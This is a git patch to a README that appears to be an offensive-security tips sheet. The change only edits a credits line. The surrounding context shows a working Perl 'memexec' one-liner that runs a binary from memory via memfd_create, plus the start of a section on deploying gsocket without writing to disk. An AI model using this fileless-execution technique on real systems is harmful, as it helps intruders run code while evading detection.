From fd30ac269806a9c79624d0385d6730111e286130 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sun, 8 Sep 2024 22:43:07 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c554b56..eeb23ad 100644 --- a/README.md +++ b/README.md @@ -2046,7 +2046,7 @@ The shortest possible variant is (example): memexec(){ perl '-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o();exec{"/proc/$$/fd/$f"}X,@ARGV' -- "$@";} # Example: cat /usr/bin/id | memexec -u ``` -(Thank you [tmp.Out](https://tmpout.sh/) for some educated discussions) +(Thank you [tmp.Out](https://tmpout.sh/) for some educated discussions and [previous work](https://captain-woof.medium.com/how-to-execute-an-elf-in-memory-living-off-the-land-c7e67dbc3100) by others) Deploy gsocket without writing to the filesystem (example): ```sh